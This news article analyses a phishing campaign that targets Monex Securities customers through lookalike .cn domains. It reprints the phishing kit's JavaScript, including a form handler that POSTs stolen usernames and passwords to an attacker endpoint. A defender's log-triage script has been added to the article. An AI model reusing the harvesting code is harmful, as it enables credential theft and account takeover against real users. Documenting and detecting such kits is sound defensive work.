New Phishing Campaign Attacking Investors to Steal Login Credentials


Apr 4, 2025 - 08:22

A sophisticated phishing campaign has emerged targeting users of Monex Securities, one of Japan’s largest online brokerage platforms formed through the merger of Monex, Inc. and Nikko Beans, Inc.

Since early April 2025, attackers have deployed a series of fraudulent domains leveraging the .cn top-level domain to impersonate Monex’s legitimate services.

These domains use randomized alphanumeric strings in their root paths followed by the “/monex/” directory (e.g., hxxps://ijnu[.]cn/monex), creating URLs that superficially resemble authentic Monex subdomains.

The campaign employs socially engineered emails with the subject line “【マネックス証券】登録情報の確認および更新のお願い” (“[Monex Securities] Request to confirm and update registered information”), urging recipients to “verify account details” through embedded links.

Broadcom analysts observed that clicking these links redirects victims to fake login pages replicating Monex Securities’ authentication interface.

The pages dynamically adjust their layout using CSS media queries to match both desktop and mobile resolutions, increasing their credibility.

Attackers exfiltrate submitted credentials in real time through POST requests to attacker-controlled endpoints, enabling immediate account takeover attempts.

Infection Chain and Technical Infrastructure

The campaign’s operational infrastructure relies on disposable domains registered through Chinese TLD providers, with DNS records pointing to cloud-hosted virtual private servers (VPS).

Analysis of one phishing kit revealed a three-stage credential harvesting process:

// Stage 1: landing script, runs as soon as the lure page has loaded
document.addEventListener('DOMContentLoaded', function() {
  // Per-victim tracking token: the current epoch time in milliseconds, Base64-encoded
  window.location.href = 'https://ijnu[.]cn/monex/login?session='
    + btoa(Date.now());
});

This initial script generates a unique session identifier encoded in Base64, allowing attackers to track individual victims even if they abandon the login process prematurely.

The subsequent login form uses JavaScript validation to ensure password complexity requirements match Monex’s actual policies before transmitting credentials:

// Credential submission handler
document.getElementById('loginForm').addEventListener('submit', function(e) {
  e.preventDefault();
  const creds = {
    user: document.getElementById('username').value,
    pass: document.getElementById('password').value
  };

  fetch('https://ijnu[.]cn/api/collect', {
    method: 'POST',
    headers: {'Content-Type': 'application/json'},
    body: JSON.stringify(creds)
  }).then(() => {
    window.location.href = 'https://monex-sec[.]com/error?code=503';
  });
});

This script exfiltrates credentials to /api/collect before redirecting victims to Monex’s legitimate error page, creating the illusion of a temporary service interruption rather than a security breach.
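A defender-side triage helper, added here as an example and not part of the original article or of Broadcom's analysis: it flags proxy-log URLs that match the lookalike pattern described above (a short alphanumeric .cn label followed by a /monex/ path, or a POST to /api/collect on such a host) and decodes the kit's btoa(Date.now()) session token back into the victim's click time. The log format, client IP and the broker.example domain are constructed for the sample.

```python
import base64
import binascii
import re
from datetime import datetime, timezone
from urllib.parse import parse_qs, urlparse

# Hostname shape described in the article: a short random alphanumeric label
# directly under .cn; the brand name only ever appears in the path.
LOOKALIKE_HOST = re.compile(r"^[a-z0-9]{2,16}\.cn$", re.IGNORECASE)

def refang(url):  # hxxps://x[.]cn -> https://x.cn so urlparse can read it
    return url.replace("[.]", ".").replace("hxxp", "http")

def is_monex_lookalike(url):
    """True for <random>.cn hosts whose first path segment is /monex."""
    p = urlparse(refang(url))
    path = p.path.lower()
    return bool(LOOKALIKE_HOST.match(p.hostname or "")) and (
        path == "/monex" or path.startswith("/monex/"))

def decode_session_token(url):
    """Stage 1 of the kit appends ?session=btoa(Date.now()), i.e. Base64 of the
    millisecond epoch at click time; return it as a UTC datetime, or None."""
    token = parse_qs(urlparse(refang(url)).query).get("session", [""])[0]
    try:
        ms = int(base64.b64decode(token, validate=True).decode("ascii"))
    except (ValueError, binascii.Error):
        return None
    return datetime.fromtimestamp(ms / 1000, tz=timezone.utc)

def triage_proxy_log(lines):
    """Return (url, click_time) for lookalike page loads and for POSTs to the
    kit's /api/collect exfiltration endpoint on such a host."""
    hits = []
    for line in lines:
        parts = line.split()  # constructed format: ts client method url status
        if len(parts) < 5:
            continue
        method, url = parts[2], parts[3]
        p = urlparse(refang(url))
        exfil = (method == "POST" and p.path == "/api/collect"
                 and LOOKALIKE_HOST.match(p.hostname or ""))
        if is_monex_lookalike(url) or exfil:
            hits.append((url, decode_session_token(url)))
    return hits

# Constructed sample: one victim loads the lure, then the kit POSTs the credentials.
SAMPLE_TOKEN = base64.b64encode(b"1743754920000").decode()  # btoa(Date.now()) equivalent
SAMPLE_LOG = [
    f"2025-04-04T08:22:00Z 10.0.0.12 GET hxxps://ijnu[.]cn/monex/login?session={SAMPLE_TOKEN} 200",
    "2025-04-04T08:22:41Z 10.0.0.12 POST hxxps://ijnu[.]cn/api/collect 200",
    "2025-04-04T08:23:05Z 10.0.0.12 GET https://broker.example/monex/ 200",
]
```

Running `triage_proxy_log(SAMPLE_LOG)` returns the lure load (with its decoded click time) and the exfiltration POST, while the unrelated broker.example request is ignored.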

Symantec’s WebPulse-enabled products now block access to all identified infrastructure components, while their email security suite quarantines messages containing the malicious links.

Financial institutions are advised to implement multi-factor authentication (MFA) methods that do not depend on SMS-based codes; this campaign’s infrastructure cannot currently intercept such factors.


The post New Phishing Campaign Attacking Investors to Steal Login Credentials appeared first on Cyber Security News.